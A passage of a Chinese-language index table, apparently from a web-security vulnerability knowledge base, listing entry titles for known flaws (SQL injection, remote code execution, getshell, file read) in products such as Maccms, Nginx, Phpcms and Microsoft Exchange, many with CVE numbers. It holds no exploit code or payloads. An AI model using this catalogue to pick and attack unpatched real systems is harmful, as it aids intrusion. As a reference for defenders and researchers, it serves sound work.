| 422  | Web安全 | Maccms                         | {'id': 5809, 'name': 'Maccms 8.x(苹果cms)命令执行漏洞', 'pid': 76, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5809, 'title': None}                                                                        |
| 423  | Web安全 | Maccms                         | {'id': 5810, 'name': 'Maccms 8.x(苹果cms)post注入', 'pid': 76, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5810, 'title': None}                                                                        |
| 424  | Web安全 | Maccms                         | {'id': 5811, 'name': '（CVE-2019-9829）Maccms背景任意文件写入getshell', 'pid': 76, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5811, 'title': None}                                                          |
| 425  | Web安全 | Magento                        | {'id': 6684, 'name': 'Magento 2.2 SQL注入漏洞', 'pid': 299, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6684, 'title': None}                                                                           |
| 426  | Web安全 | MantisBT                       | {'id': 7110, 'name': '（CVE-2017-7615）MantisBT 任意密码重置漏洞', 'pid': 401, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7110, 'title': None}                                                              |
| 427  | Web安全 | MantisBT                       | {'id': 7111, 'name': '（CVE-2019-15715）MantisBT 远程命令执行漏洞', 'pid': 401, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7111, 'title': None}                                                             |
| 428  | Web安全 | Mariadb                        | {'id': 5812, 'name': '（CVE-2020-7221）Mariadb 提权漏洞', 'pid': 77, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5812, 'title': None}                                                                    |
| 429  | Web安全 | Memcache                       | {'id': 5813, 'name': 'Memcache未授权访问', 'pid': 78, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5813, 'title': None}                                                                                  |
| 430  | Web安全 | MetInfo                        | {'id': 7268, 'name': 'MetInfo v4.0 水平越权漏洞', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7268, 'title': None}                                                                            |
| 431  | Web安全 | MetInfo                        | {'id': 7072, 'name': 'MetInfo v5.3.12 member/login.php sql注入漏洞', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7072, 'title': None}                                                       |
| 432  | Web安全 | MetInfo                        | {'id': 5816, 'name': 'MetInfo v6.1.0 系统中一处旧插件导致的ssrf', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5816, 'title': None}                                                                 |
| 433  | Web安全 | MetInfo                        | {'id': 5815, 'name': 'Metinfo v6.1.0 任意文件读取漏洞', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5815, 'title': None}                                                                        |
| 434  | Web安全 | MetInfo                        | {'id': 5814, 'name': 'Metinfo v6.1.2 sql注入漏洞', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5814, 'title': None}                                                                         |
| 435  | Web安全 | MetInfo                        | {'id': 7377, 'name': 'MetInfo v6.1.2 线留言处布尔注入漏洞', 'pid': 79, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7377, 'title': None}                                                                      |
| 436  | Web安全 | Microsoft Exchange             | {'id': 5817, 'name': '（CVE-2020-0688）Microsoft Exchange 远程命令执行漏洞', 'pid': 80, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5817, 'title': None}                                                     |
| 437  | Web安全 | Microsoft Exchange             | {'id': 7150, 'name': '（CVE-2020-16875）Microsoft Exchange 远程命令执行漏洞', 'pid': 80, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7150, 'title': None}                                                    |
| 438  | Web安全 | Microsoft Exchange             | {'id': 7300, 'name': '（CVE-2020-17144）Microsoft Exchange 远程代码执行漏洞', 'pid': 80, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7300, 'title': None}                                                    |
| 439  | Web安全 | Microsoft SharePoint           | {'id': 6827, 'name': '（CVE-2019-0604）Microsoft SharePoint 远程代码执行漏洞', 'pid': 337, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6827, 'title': None}                                                  |
| 440  | Web安全 | Microsoft SharePoint           | {'id': 7149, 'name': '（CVE-2020-1181）Microsoft SharePoint 远程代码执行漏洞', 'pid': 337, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7149, 'title': None}                                                  |
| 441  | Web安全 | Mini\_httpd                    | {'id': 6685, 'name': '（CVE-2018-18778）Mini\_httpd 任意文件读取漏洞', 'pid': 300, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6685, 'title': None}                                                          |
| 442  | Web安全 | Mintinstall                    | {'id': 5818, 'name': '（CVE-2019-17080）Mintinstall object injection', 'pid': 81, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5818, 'title': None}                                                   |
| 443  | Web安全 | MIP建站系统                        | {'id': 5819, 'name': 'MIP建站系统 v5.0.5 SSRF漏洞', 'pid': 82, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5819, 'title': None}                                                                          |
| 444  | Web安全 | MKCMS                          | {'id': 5820, 'name': 'MKCMS v5.0 /ucenter/reg.php前台注入漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5820, 'title': None}                                                              |
| 445  | Web安全 | MKCMS                          | {'id': 5821, 'name': 'MKCMS v5.0 任意密码重置漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5821, 'title': None}                                                                            |
| 446  | Web安全 | MKCMS                          | {'id': 5822, 'name': 'MKCMS v6.2 验证码重用', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5822, 'title': None}                                                                               |
| 447  | Web安全 | MKCMS                          | {'id': 5823, 'name': 'MKCMS v6.2 /ucenter/active.php前台sql注入漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5823, 'title': None}                                                        |
| 448  | Web安全 | MKCMS                          | {'id': 5824, 'name': 'MKCMS v6.2 /ucenter/reg.php前台sql注入漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5824, 'title': None}                                                           |
| 449  | Web安全 | MKCMS                          | {'id': 5825, 'name': 'MKCMS v6.2 任意用户密码找回漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5825, 'title': None}                                                                          |
| 450  | Web安全 | MKCMS                          | {'id': 5826, 'name': 'MKCMS v6.2 备份文件路径可猜解', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5826, 'title': None}                                                                           |
| 451  | Web安全 | MKCMS                          | {'id': 7331, 'name': 'MKCMS v7.0.3 前台sql注入漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7331, 'title': None}                                                                         |
| 452  | Web安全 | MKCMS                          | {'id': 7332, 'name': 'MKCMS v7.0.3 后台sql注入漏洞', 'pid': 83, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7332, 'title': None}                                                                         |
| 453  | Web安全 | MobileIron                     | {'id': 7095, 'name': '（CVE-2020-15505）MobileIron 远程命令执行漏洞', 'pid': 396, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7095, 'title': None}                                                           |
| 454  | Web安全 | ModSecurity                    | {'id': 5827, 'name': '（CVE-2019-19886）ModSecurity 拒绝服务漏洞', 'pid': 84, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5827, 'title': None}                                                             |
| 455  | Web安全 | Mongo DB                       | {'id': 5828, 'name': 'Mongo DB未授权访问', 'pid': 85, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5828, 'title': None}                                                                                  |
| 456  | Web安全 | Mongo express                  | {'id': 5829, 'name': '（CVE-2019-10758）Mongo expres rce', 'pid': 86, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5829, 'title': None}                                                               |
| 457  | Web安全 | Monstra CMS                    | {'id': 6702, 'name': 'Monstra CMS <= 3.0.4 任意文件删除漏洞', 'pid': 305, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6702, 'title': None}                                                                 |
| 458  | Web安全 | Monstra CMS                    | {'id': 7146, 'name': '（CVE-2020-13384）Monstra CMS v3.0.4 任意文件上传漏洞', 'pid': 305, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7146, 'title': None}                                                   |
| 459  | Web安全 | MS Office for Mac              | {'id': 7404, 'name': '（CVE-2018-8412）MS Office for Mac 中的Legacy Package 本地提权漏洞', 'pid': 504, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7404, 'title': None}                                      |
| 460  | Web安全 | Mssql                          | {'id': 7075, 'name': 'Mssql 模拟登录提权', 'pid': 389, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7075, 'title': None}                                                                                  |
| 461  | Web安全 | Mssql                          | {'id': 7076, 'name': 'Mssql 受信用数据库提权', 'pid': 389, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7076, 'title': None}                                                                                |
| 462  | Web安全 | MyBatis                        | {'id': 7158, 'name': '（CVE-2020-26945）MyBatis 二级缓存反序列化漏洞', 'pid': 421, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7158, 'title': None}                                                            |
| 463  | Web安全 | MyBB                           | {'id': 5830, 'name': 'MyBB 后台代码执行漏洞', 'pid': 87, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5830, 'title': None}                                                                                  |
| 464  | Web安全 | MyBB                           | {'id': 5831, 'name': 'MyBB <= 1.8.3 rce漏洞', 'pid': 87, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5831, 'title': None}                                                                            |
| 465  | Web安全 | Mysql                          | {'id': 5832, 'name': 'MySQL LOAD DATA 读取客户端任意文件', 'pid': 88, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5832, 'title': None}                                                                      |
| 466  | Web安全 | MyuCMS                         | {'id': 6971, 'name': 'MyuCMS v2.1 前台任意文件下载', 'pid': 369, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6971, 'title': None}                                                                          |
| 467  | Web安全 | MyuCMS                         | {'id': 6972, 'name': 'MyuCMS v2.1 任意目录删除漏洞', 'pid': 369, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6972, 'title': None}                                                                          |
| 468  | Web安全 | MyuCMS                         | {'id': 6973, 'name': 'MyuCMS v2.1 sql注入漏洞', 'pid': 369, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6973, 'title': None}                                                                           |
| 469  | Web安全 | MyuCMS                         | {'id': 6974, 'name': 'MyuCMS v2.1 文件上传漏洞', 'pid': 369, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6974, 'title': None}                                                                            |
| 470  | Web安全 | MyuCMS                         | {'id': 6975, 'name': 'MyuCMS v2.1 命令执行漏洞', 'pid': 369, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6975, 'title': None}                                                                            |
| 471  | Web安全 | Net::FTP                       | {'id': 6969, 'name': '（CVE-2017-17405）Net::FTP 模块命令注入漏洞', 'pid': 367, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6969, 'title': None}                                                             |
| 472  | Web安全 | Nette                          | {'id': 7160, 'name': '（CVE-2020-15227）Nette 远程代码执行漏洞', 'pid': 423, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7160, 'title': None}                                                                |
| 473  | Web安全 | Newbee-mall                    | {'id': 5833, 'name': 'CVE-2019-19113）Newbee-mall新蜂商城sql注入', 'pid': 89, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5833, 'title': None}                                                            |
| 474  | Web安全 | NewZhan CMS                    | {'id': 6740, 'name': 'NewZhan CMS sql注入漏洞', 'pid': 311, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6740, 'title': None}                                                                           |
| 475  | Web安全 | Nexus                          | {'id': 5834, 'name': '（CVE-2019-5475）Nexus2 yum插件RCE漏洞', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5834, 'title': None}                                                               |
| 476  | Web安全 | Nexus                          | {'id': 6649, 'name': '（CVE-2019-7238）Nexus Repository Manager 远程代码执行', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6649, 'title': None}                                                 |
| 477  | Web安全 | Nexus                          | {'id': 6648, 'name': '（CVE-2020-10199）Nexus Repository Manager 远程代码执行漏洞', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6648, 'title': None}                                              |
| 478  | Web安全 | Nexus                          | {'id': 5835, 'name': '（CVE-2020-10204）Nexus Repository Manager 远程执行代码漏洞', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5835, 'title': None}                                              |
| 479  | Web安全 | Nexus                          | {'id': 6647, 'name': '（CVE-2020-11444）Nexus Repository Manager 远程代码执行漏洞', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6647, 'title': None}                                              |
| 480  | Web安全 | Nexus                          | {'id': 7330, 'name': '（CVE-2020-29436）Nexus Repository Manager 3 XML外部实体注入漏洞', 'pid': 90, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7330, 'title': None}                                         |
| 481  | Web安全 | Nginx                          | {'id': 5836, 'name': 'Nginx 配置错误漏洞 CRLF注入漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5836, 'title': None}                                                                          |
| 482  | Web安全 | Nginx                          | {'id': 5837, 'name': 'Nginx 配置错误漏洞 目录穿越漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5837, 'title': None}                                                                            |
| 483  | Web安全 | Nginx                          | {'id': 5838, 'name': 'Nginx 配置错误漏洞 add\_header被覆盖', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5838, 'title': None}                                                                    |
| 484  | Web安全 | Nginx                          | {'id': 5839, 'name': 'Nginx 解析漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5839, 'title': None}                                                                                     |
| 485  | Web安全 | Nginx                          | {'id': 5840, 'name': '（CVE-2013-4547）Nginx URI Processing 安全绕过漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5840, 'title': None}                                                     |
| 486  | Web安全 | Nginx                          | {'id': 5841, 'name': '（CVE-2016-1247）Nginx 提权漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5841, 'title': None}                                                                      |
| 487  | Web安全 | Nginx                          | {'id': 5842, 'name': '（CVE-2017-7529）Nginx 越界读取缓存漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5842, 'title': None}                                                                  |
| 488  | Web安全 | Nginx                          | {'id': 5843, 'name': '（CVE-2019-20372）Nginx error\_page 请求走私漏洞', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5843, 'title': None}                                                       |
| 489  | Web安全 | Nginx                          | {'id': 6572, 'name': '（CVE-2020-12440）Nginx <= 1.8.0 请求走私', 'pid': 91, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6572, 'title': None}                                                            |
| 490  | Web安全 | Niushop                        | {'id': 5844, 'name': 'Niushop sql注入', 'pid': 92, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5844, 'title': None}                                                                                  |
| 491  | Web安全 | Niushop                        | {'id': 5845, 'name': 'Niushop 单商户 2.2 爆破MySQL密码', 'pid': 92, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5845, 'title': None}                                                                      |
| 492  | Web安全 | Niushop                        | {'id': 5846, 'name': 'Niushop 单商户 2.2 前台getshell', 'pid': 92, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5846, 'title': None}                                                                     |
| 493  | Web安全 | Node.js                        | {'id': 7189, 'name': '（CVE-2017-5941）Node.js 反序列化漏洞', 'pid': 301, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7189, 'title': None}                                                                 |
| 494  | Web安全 | Node.js                        | {'id': 6686, 'name': '（CVE-2017-14849）Node.js 目录穿越漏洞', 'pid': 301, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6686, 'title': None}                                                                |
| 495  | Web安全 | Node.js                        | {'id': 7271, 'name': '（CVE-2020-7699）Node.js 模块代码注入漏洞', 'pid': 301, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7271, 'title': None}                                                               |
| 496  | Web安全 | Node.js                        | {'id': 7365, 'name': '（CVE-2017-16082）Node.js postgres 模块代码执行漏洞', 'pid': 301, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7365, 'title': None}                                                     |
| 497  | Web安全 | Nostromo httpd                 | {'id': 5847, 'name': '（CVE-2019-16278）Nostromo httpd 命令执行', 'pid': 93, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5847, 'title': None}                                                            |
| 498  | Web安全 | Nostromo httpd                 | {'id': 5848, 'name': '（CVE-2019-16279）Nostromo httpd dos', 'pid': 93, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5848, 'title': None}                                                             |
| 499  | Web安全 | OKLite                         | {'id': 5849, 'name': 'OKLite v1.2.25 SQL注入导致getshell(前台)', 'pid': 94, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5849, 'title': None}                                                             |
| 500  | Web安全 | OKLite                         | {'id': 5850, 'name': '（CVE-2019-16131）OKLite v1.2.25 任意文件上传漏洞', 'pid': 94, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5850, 'title': None}                                                        |
| 501  | Web安全 | OKLite                         | {'id': 5851, 'name': '（CVE-2019-16132） OKLite v1.2.25 存在任意文件删除漏洞', 'pid': 94, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5851, 'title': None}                                                     |
| 502  | Web安全 | OKLite                         | {'id': 7048, 'name': 'OKLite v2.0.0 后台更新压缩包导致getshell', 'pid': 94, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7048, 'title': None}                                                                |
| 503  | Web安全 | OneThink                       | {'id': 7033, 'name': 'OneThink 前台注入', 'pid': 376, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7033, 'title': None}                                                                                 |
| 504  | Web安全 | Open Source Social Network     | {'id': 7297, 'name': '（CVE-2020-10560）OSSN 任意文件读取漏洞', 'pid': 464, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7297, 'title': None}                                                                 |
| 505  | Web安全 | Open-AudIT                     | {'id': 6652, 'name': '（CVE-2020-12078）Open-AudIT v3.3.1 远程命令执行漏洞', 'pid': 292, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6652, 'title': None}                                                    |
| 506  | Web安全 | OpenResty                      | {'id': 7077, 'name': '（CVE-2018-9230）bypass OpenResty waf', 'pid': 390, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7077, 'title': None}                                                           |
| 507  | Web安全 | OpenSIS                        | {'id': 7286, 'name': '（CVE-2020-6141）OpenSIS v7.3 sql注入漏洞', 'pid': 461, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7286, 'title': None}                                                           |
| 508  | Web安全 | OpenSNS                        | {'id': 5852, 'name': 'OpenSNS sql注入', 'pid': 95, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5852, 'title': None}                                                                                  |
| 509  | Web安全 | OpenSNS                        | {'id': 5853, 'name': 'OpenSNS 后台getshell', 'pid': 95, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5853, 'title': None}                                                                             |
| 510  | Web安全 | OpenSNS                        | {'id': 5854, 'name': 'OpenSNS v6.1.0 前台sql注入', 'pid': 95, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5854, 'title': None}                                                                         |
| 511  | Web安全 | OpenSSH                        | {'id': 5855, 'name': '（CVE-2018-15473）OpenSSH 用户枚举漏洞', 'pid': 96, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5855, 'title': None}                                                                 |
| 512  | Web安全 | OpenSSH                        | {'id': 7035, 'name': '（CVE-2020-15778）OpenSSH 命令注入漏洞', 'pid': 96, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7035, 'title': None}                                                                 |
| 513  | Web安全 | OpenSSL                        | {'id': 6562, 'name': '（CVE-2014-0160）OpenSSL 心脏出血漏洞', 'pid': 272, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6562, 'title': None}                                                                 |
| 514  | Web安全 | OpenSSL                        | {'id': 7396, 'name': '（CVE-2020-1967）OpenSSL 拒绝服务漏洞', 'pid': 272, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7396, 'title': None}                                                                 |
| 515  | Web安全 | OurPHP                         | {'id': 7275, 'name': 'OurPHP v1.82 前台注册页面sql注入漏洞', 'pid': 458, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7275, 'title': None}                                                                    |
| 516  | Web安全 | OurPHP                         | {'id': 7276, 'name': 'OurPHP v1.9.1 后台任意文件读取漏洞', 'pid': 458, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7276, 'title': None}                                                                      |
| 517  | Web安全 | OurPHP                         | {'id': 7274, 'name': 'OurPHP v2.1 后台任意文件上传漏洞', 'pid': 458, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7274, 'title': None}                                                                        |
| 518  | Web安全 | PageAdmin                      | {'id': 5856, 'name': 'PageAdmin 文件上传getshell', 'pid': 97, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5856, 'title': None}                                                                         |
| 519  | Web安全 | PageAdmin                      | {'id': 5857, 'name': 'PageAdmin sql注入漏洞', 'pid': 97, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5857, 'title': None}                                                                              |
| 520  | Web安全 | PageAdmin                      | {'id': 7363, 'name': 'PageAdmin v4.0.09 后台sql注入漏洞', 'pid': 97, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7363, 'title': None}                                                                    |
| 521  | Web安全 | PbootCMS                       | {'id': 5858, 'name': 'PbootCMS sql注入', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5858, 'title': None}                                                                                 |
| 522  | Web安全 | PbootCMS                       | {'id': 5859, 'name': 'PbootCMS csrf', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5859, 'title': None}                                                                                  |
| 523  | Web安全 | PbootCMS                       | {'id': 5860, 'name': '（CVE-2018-16356）PbootCMS sql注入漏洞', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5860, 'title': None}                                                               |
| 524  | Web安全 | PbootCMS                       | {'id': 5861, 'name': '（CVE-2018-16357）PbootCMS sql注入漏洞', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5861, 'title': None}                                                               |
| 525  | Web安全 | PbootCMS                       | {'id': 5862, 'name': 'PbootCMS v2.0.7 默认数据库下载', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5862, 'title': None}                                                                        |
| 526  | Web安全 | PbootCMS                       | {'id': 5863, 'name': 'PbootCMS v2.0.7 任意文件读取', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5863, 'title': None}                                                                         |
| 527  | Web安全 | PbootCMS                       | {'id': 5864, 'name': 'PbootCMS v2.0.7 模板注入', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5864, 'title': None}                                                                           |
| 528  | Web安全 | PbootCMS                       | {'id': 6573, 'name': 'PbootCMS v2.0.7 前台任意文件包含漏洞', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6573, 'title': None}                                                                     |
| 529  | Web安全 | PbootCMS                       | {'id': 6738, 'name': 'PbootCMS v2.0.9 远程代码执行漏洞', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6738, 'title': None}                                                                       |
| 530  | Web安全 | PbootCMS                       | {'id': 7134, 'name': 'PbootCMS v3.0.1 远程代码执行漏洞', 'pid': 98, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7134, 'title': None}                                                                       |
| 531  | Web安全 | Php                            | {'id': 6757, 'name': '（一）Php screw加密与破解工具（php-screw-brute）', 'pid': 317, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6757, 'title': None}                                                          |
| 532  | Web安全 | Php                            | {'id': 6758, 'name': '（二）Php screw加密与破解工具（screw\_decode）', 'pid': 317, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6758, 'title': None}                                                            |
| 533  | Web安全 | Php                            | {'id': 6759, 'name': '（三）通过IDA获取加密的key', 'pid': 317, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6759, 'title': None}                                                                              |
| 534  | Web安全 | Php                            | {'id': 6760, 'name': '（四）php-screw加密文件', 'pid': 317, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6760, 'title': None}                                                                              |
| 535  | Web安全 | Php                            | {'id': 6689, 'name': 'Php文件包含漏洞（利用phpinfo）', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6689, 'title': None}                                                                           |
| 536  | Web安全 | Php                            | {'id': 6690, 'name': 'Php XDebug 远程调试漏洞', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6690, 'title': None}                                                                              |
| 537  | Web安全 | Php                            | {'id': 5867, 'name': 'php mt\_rand函数的安全问题探讨', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5867, 'title': None}                                                                          |
| 538  | Web安全 | Php                            | {'id': 5866, 'name': 'PHP序列化和反序列化语法差异问题', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5866, 'title': None}                                                                              |
| 539  | Web安全 | Php                            | {'id': 6544, 'name': '（CVE-2012-1823）PHP-CGI远程代码执行漏洞', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6544, 'title': None}                                                                 |
| 540  | Web安全 | Php                            | {'id': 6688, 'name': '（CVE-2018-19518）PHP imap 远程命令执行漏洞', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6688, 'title': None}                                                              |
| 541  | Web安全 | Php                            | {'id': 5865, 'name': '（CVE-2019-11043）PHP 远程命令执行', 'pid': 99, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5865, 'title': None}                                                                     |
| 542  | Web安全 | Pgadmin4                       | {'id': 7215, 'name': 'Pgadmin4 无需得知email的暴力破解漏洞', 'pid': 437, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7215, 'title': None}                                                                     |
| 543  | Web安全 | Pgadmin4                       | {'id': 7216, 'name': 'Pgadmin4 后台任意文件读取/修改 漏洞', 'pid': 437, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7216, 'title': None}                                                                       |
| 544  | Web安全 | Pgadmin4                       | {'id': 7217, 'name': 'Pgadmin4 替换数据库文件导致的反序列化漏洞', 'pid': 437, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7217, 'title': None}                                                                     |
| 545  | Web安全 | PhpBB                          | {'id': 6667, 'name': '（CVE-2019-13376）PhpBB从session id泄露到CSRF到XSS', 'pid': 295, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6667, 'title': None}                                                   |
| 546  | Web安全 | PhpBB                          | {'id': 7090, 'name': '（CVE-2018-19274）phpBB v3.2.3 Phar反序列化远程代码漏洞', 'pid': 295, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7090, 'title': None}                                                   |
| 547  | Web安全 | Phpcms                         | {'id': 6545, 'name': '（CVE-2018-19127）Phpcms2008 Type.php代码注入漏洞', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 6545, 'title': None}                                                     |
| 548  | Web安全 | Phpcms                         | {'id': 7020, 'name': 'Phpcms v9.5.8 后台getshell', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7020, 'title': None}                                                                      |
| 549  | Web安全 | Phpcms                         | {'id': 7017, 'name': 'Phpcms v9.6.0 authkey泄露导致注入', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7017, 'title': None}                                                                   |
| 550  | Web安全 | Phpcms                         | {'id': 5868, 'name': 'Phpcms v9.6.0后台getshell', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5868, 'title': None}                                                                       |
| 551  | Web安全 | Phpcms                         | {'id': 7018, 'name': 'Phpcms v9.6.0 数据库备份爆破', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7018, 'title': None}                                                                         |
| 552  | Web安全 | Phpcms                         | {'id': 7019, 'name': 'Phpcms v9.6.0 任意密码重置漏洞', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 7019, 'title': None}                                                                        |
| 553  | Web安全 | Phpcms                         | {'id': 5869, 'name': 'Phpcms v9.6.0 sql注入', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5869, 'title': None}                                                                           |
| 554  | Web安全 | Phpcms                         | {'id': 5870, 'name': 'Phpcms v9.6.0 任意文件上传', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5870, 'title': None}                                                                          |
| 555  | Web安全 | Phpcms                         | {'id': 5871, 'name': 'Phpcms v9.6.1 任意文件读取', 'pid': 100, 'cid': None, 'treeNode': None, 'permission': 1, 'infoId': 5871, 'title': None}                                                                          |
